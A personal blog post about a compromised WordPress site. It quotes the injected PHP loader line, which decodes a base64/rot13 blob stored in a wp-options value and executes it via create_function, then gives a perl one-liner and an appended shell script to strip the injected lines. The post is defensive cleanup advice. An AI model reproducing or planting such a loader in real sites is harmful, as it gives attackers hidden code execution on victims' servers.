We’re back

So I totally got hacked. Reminder: be vigilant about upgrading WordPress and its plugins, or bad things happen.

The hack looks like this, and appears all over the place, at the top of some files and the bottom of others. It decodes a huge blob of encoded text that was stuffed into one of the wp-options values.

get_option("_transient_feed_98e8dbd04edf43b096e815a29343b006"); $z=base64_decode(str_rot13($z)); if(strpos($z,"0FE00707")!==false){ $_z=create_function("",$z); @$_z(); }

My first thought: “Oh crap, removing that text from hundreds of files? No thanks.” Command line to the rescue! Thanks to Perl for still being awesome after all these years.

find . -name "*.php" -exec perl -e 's/^.*_transient_feed_98e8dbd04edf43b096e815a29343b006.*$//g' -p -i {} \;

If you’ve been struck by the same thing, just replace the _transient_feed with your own (the numbers probably change). These script-kiddy hackers are a perpetual annoyance. Hey kids – go build something awesome and useful instead of messing up our web sites.
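
A more cautious variant of the cleanup above, as an added example that is not the author's code: it lists hits before changing anything, matches any _transient_feed_ name followed by 32 hex digits (an assumption about how the variants differ), and keeps the infected originals in a backup directory outside the web root. The function names, the --demo flag and the sample files are constructed for illustration.

```shell
#!/bin/sh
# Added example (not the author's code). Assumption: every variant hardcodes an
# option name shaped like _transient_feed_<32 hex digits>, as in the post.
MARKER='_transient_feed_[0-9a-f]\{32\}'

# Read-only: print file:line:text for every hit so it can be reviewed first.
show_injected() {
    find "$1" -type f -name '*.php' -exec grep -Hn -- "$MARKER" {} +
}

# Read-only: print just the names of affected files.
scan_injected() {
    find "$1" -type f -name '*.php' -exec grep -l -- "$MARKER" {} +
}

# Remove matching lines. The untouched infected copy goes to a backup directory
# outside the web root ($2) so it is kept for forensics but never served.
# Limitation: file names containing newlines are not handled.
clean_injected() {
    root=${1%/} backup=$2
    scan_injected "$root" | while IFS= read -r f; do
        rel=${f#"$root"/}
        mkdir -p "$backup/$(dirname "$rel")"
        cp -p "$f" "$backup/$rel" || continue   # never edit a file with no backup
        # grep -v exits 1 when no lines remain; that is not an error here.
        grep -v -- "$MARKER" "$backup/$rel" > "$f" || true
    done
}

# Constructed sample tree: one clean file, one with a placeholder injected line.
make_sample() {
    mkdir -p "$1/wp-content"
    printf '%s\n' '<?php' 'echo "clean";' > "$1/index.php"
    printf '%s\n' '<?php' \
        '$z=get_option("_transient_feed_00000000000000000000000000000000"); /* constructed */' \
        'echo "theme";' > "$1/wp-content/functions.php"
}

# Demo: sh cleanup.sh --demo
if [ "${1:-}" = "--demo" ]; then
    d=$(mktemp -d) && make_sample "$d/site"
    show_injected "$d/site"
    clean_injected "$d/site" "$d/backup"
    rm -rf "$d"
fi
```

As the post says, the encoded payload itself sits in a wp-options value, so removing the lines from the PHP files does not remove the stored blob; that row has to be deleted from the database as well.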

By Dan Walmsley
